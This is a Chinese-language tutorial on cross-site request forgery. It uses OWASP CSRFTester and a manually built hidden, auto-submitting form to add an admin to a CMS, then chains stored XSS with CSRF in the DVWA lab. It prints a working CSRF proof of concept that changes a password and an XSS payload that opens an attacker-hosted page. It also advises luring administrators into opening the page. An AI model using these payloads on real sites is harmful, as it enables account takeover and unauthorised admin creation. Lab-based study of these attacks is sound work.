声明：文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用，任何人不得将其用于非法用途以及盈利等目的，否则后果自行承担！

跨站请求攻击，简单地说，是攻击者通过一些技术手段欺骗用户 的浏览器 去访问一个自己曾经认证过的网站并运行一些操作（如发邮件，发消息，甚至财产操作如转账和购买商品）。由于浏览器曾经认证过，所以被访问的网站会认为是真正的用户操作而去运行。这利用了web中用户身份验证的一个漏洞：简单的身份验证只能保证请求发自某个用户的浏览器，却不能保证请求本身是用户自愿发出的。

入门

我们先来看看CSRF和XSS的工作原理，先让大家把这两个分开来。‍‍‍‍‍‍‍‍‍‍
‍‍**XSS：**‍‍

攻击者发现XSS漏洞——构造代码——发送给受害人——受害人打开——攻击者获取受害人的cookie——完成攻击

‍‍**CSRF：**‍‍

攻击者发现CSRF漏洞——构造代码——发送给受害人——受害人打开——受害人执行代码——完成攻击

‍‍而且XSS容易发现，因为攻击者需要登录后台完成攻击。管理员可以看日志发现攻击者。‍‍‍‍而CSRF则不同，他的攻击一直是管理员自己实现的，攻击者只负责了构造代码，让管理员去点。‍

我这只是简单的说明下流程。大伙应该发现CSRF少了一个 获取受害人的cookie的步骤。为什么会少了呢。因为受害人在执行代码的时候就已经完成的攻击，而攻击者并没有参与进来。

‍‍举个例子来说吧 (受害者的网址是a.cn，攻击者的网址是b.cn) 攻击者想要在某个网站(网站是某个开源CMS)添加上另一个管理员，但是这个网站并没有XSS漏洞。怎么办呢？这时攻击者发现了这个开源CMS后台添加管理员时并没有加入 验证码 或 token，只需要输入要添加的管理员账号和密码点击确定就可以添加管理员账户了。这时和我一样聪明的攻击者在自己的服务器上建立了一个html文件(假设地址是b.cn/index.html)。然后就给网站管理员发邮件等等，诱使管理员打开b.cn/index.html。当管理员打开后（这时管理员正在网站后台，或者管理员的session并没有失效的话），就可以神不知鬼不觉的在网站后台添加了一个管理员账户。‍

相信这时大伙已经明白CSRF和XSS的区别了，不是太明白也没事，下面还有。接下来我先给大家介绍一个软件，在运用实例来详细的说明CSRF。

‍‍OWASP CSRFTester：

这是OWASP推出的CSRF半自动化软件，他省去了CSRF最繁琐的过程，代码构造。下面是软件的截图‍


‍‍这款软件是由java编写的，所以在运行软件之前需要事先安装java环境，cmd窗口是告诉我们此时软件正在监听8008端口。软件的大致介绍就到这，后文我将进一步的说明。‍

这里我选择了“XYCMS中心小学建站系统”‍

‍‍OK，我们进入后台a.cn:88/admin，账号密码默认都是admin。进入后台，我们选择“管理员管理”‍


‍‍我想细心的人已经发现了。他只要求你输入 账号 密码 确认密码。没有发现验证码验证。 我们在浏览器里代理下8008端口 (虽然网站是88端口，但是还是可以监听到数据，所以不必在意网站是88，软件监听的是8008的问题。因为在浏览器里任何数据都必须要经过8008，网站虽说是88端口，但是数据还要转到8008端口)。然后用软件看下有没有token的存在(你也可以用burp、fiddler等等)。‍

点击开始‍

‍‍我们在网站里输入账号和密码。‍

点击提交数据后，软件就会抓到数据包了。‍

下面4个是傲游浏览器发送的，把他们删除。第二个是跳转，我们也把他删除。‍

‍‍我们发现并没有找到token的值，那么我们就可以来实现CSRF攻击了。‍‍
‍‍我们发现并没有找到token的值，那么我们就可以来实现CSRF攻击了。‍‍

‍‍看到下面的Report Type了么。这些是让你选择用什么方法来进行攻击。‍

‍‍**Forms：**创建一个form表单。内容为hidden(隐藏)，用户不可见（可POST、GET）‍

‍‍**iFrame：**创建一个iframe框架，高宽为0，用户不可见。（可POST、GET）‍

‍‍**IMG：**创建一个IMG标签(只能GET)。‍

‍‍**XHR：**创建一个AJAX请求(可POST、GET)‍

‍‍**Link：**创建一个a标签的超链接(只能GET)

‍‍‍‍OK，介绍完了。但是呢，这五个里，我只推荐第一个。原因有下：‍‍

‍‍第二个容易找不到对象(如果你是新手，对JavaScript不熟的话，不建议选择这个)‍‍

‍‍第三个只能发送GET请求，有限制。‍

‍‍第四个有跨域限制，有的浏览器不允许发送跨域请求，除非网站有设置。‍‍

‍‍第五个需要点击才能触发(当然可以修改为自动触发)，还有一个是他也只能发送GET请求。‍

‍‍Ok，我这时选择forms选项，他会生成一个HTML文件，而且会自动打开，如果不成功不要灰心，这个软件不是特别的完整，有些地方需要改进。不成功的话就打开HTML改下源码，参照浏览器的审查元素就行。‍

‍‍‍‍点击Generate HTML来生成，生成好后，把生成的index.html放到b.cn下。诱使管理员打开，管理员打开后，将会是这样：‍‍‍

成功了，我们在后台看下。‍

可以看到成功添加了。‍‍

‍‍我们可以把这个index.html放到自己服务器上，诱使管理员打开，然后了管理员当时正在后台，或则管理员的session没有过期，你可以在网站留言板里吧网址写上去。就可以完成CSRF攻击了。

‍‍这里我不用上面这个软件，再完成一次攻击

我‍‍想入侵一个网站，得知这个网站使用的是XYCMS，于是我在网上把XYCMS源码下载下来，分析下。我发现在后台添加管理员的地方没有token验证，于是我就走上了构造带代码一路。‍

F12看下添加管理员的链接是什么‍

打开此链接就是添加管理员的地方。‍

‍‍Ctrl+U 看下源代码，把form标签里的内容全部复制下来，放到本地的html文件里。去掉没用的代码。就像下面这样：‍

OK，现在我们来改下，把action改成目标网站(a.cn)，然后在input类型为text的地方，加上Value的值，这个值就是你要添加的管理员账号和密码，改后为：‍

我们打开测试下，看能不能添加管理员‍

点击“提交数据”‍

添加成功了，剩下的就是自动提交了，这里就要用到JavaScript了。‍

打开后，自动添加了。接下来就是让表单隐藏，我们加个style让form为隐藏就行了。像下面这样：‍

一个csrf网页就完成了，上传到b.cn，诱使管理员打开就行了。

XSS+CSRF组合拳

组合拳思路

存储型 XSS + CSRF（存储型 XSS 攻击代码中加入 CSRF 代码链接）

1、构造 POC

a、构造 CSRF 代码
这里建议使用 CSRFTester 工具生成的 POC，比使用 BurpSuite 生成的 POC 更加隐蔽，受害者打开该 POC 后，浏览器会自动执行代码随后跳转到正常页面，中途不需要用户交互，也不用像 BurpSuite 生成的 POC 那样还需要受害者手动点击按钮。

继续来看，咱们需要首先为浏览器设置 8008 代理，打开 DVWA 的 CSRF 模块，输入密码后，先别急着点击 Change.

这时先开启 CSRFTester 的流量记录功能

开启后，再点击 Change，之后 CSRFTester 就会抓取到修改密码的数据包，这个时候，一般 CSRFTester 还会记录其他流量，所以直接右击将不相关的流量进行删除即可，只保留我们需要的流量。

之后，在 Form Parameters 中将左侧 Query Parameters 数据修改复制即可，值得注意的是 Display in Browers 选项是默认勾选的，这里建议根据自己情况而定。因为这个工具自动生成的代码在我这边是需要手动修改才能利用的，所以我这边选择取消勾选。

之后点击 Generate HTML，选择保存的位置后，手动进行修改即可，当然如果工具生成的代码可以正常使用，就不需要修改了。

对于代码的修改，我主要是将 head、H2标题的内容删除了，以增加隐蔽性。同时增加了倒数第 4 行的代码，因为没有这一句，这个 POC 是不能正常使用的，最后修改后的 CSRF POC 代码如下。

<html>
<body onload="javascript:fireForms()">
<script language="JavaScript">
var pauses = new Array( "42" );
function pausecomp(millis){var date = new Date();var curDate = null;do { curDate = new Date(); }while(curDate-date < millis);}
function fireForms(){var count = 1;var i=0;for(i=0; i<count; i++){document.forms[i].submit();pausecomp(pauses[i]);}}
</script>
<form method="GET" name="form0" action="http://192.168.38.132:80/dvwa/vulnerabilities/csrf/?password_new=12345678&password_conf=12345678&Change=Change">
<input type="hidden" name="password_new" value="123123"/>
<input type="hidden" name="password_conf" value="123123"/>
<input type="hidden" name="Change" value="Change" />
</form>
</body>
</html>

b、构造 XSS 代码

<script src="x" onerror=javascript:window.open("http://192.168.38.1/csrf.html")></script>

2，开工

在 XSS (Stored) 模块下，插入 XSS 代码，当然了前提 Security Level 要设置为 low。

在 DVWA 中会碰到 POC 太长而无法输入完全的情况，这个时候在开发者工具中将这个框的 maxlength 值设置大一点即可，这里我设置了 500.

点击 sign guestbook 按钮，POC 就会被插进去了，之后用其他浏览器登陆其他用户，访问存储型 XSS 模块页面，当然前提也需要把 Security Level 要设置为 low.

访问页面后，浏览器会自动跳转，同时返回修改密码的界面，如果弹出页面显示如上图中的 Password Changed 字样，就说明受害者的密码修改成功了，而这也仅仅是因为受害者点击了一个页面。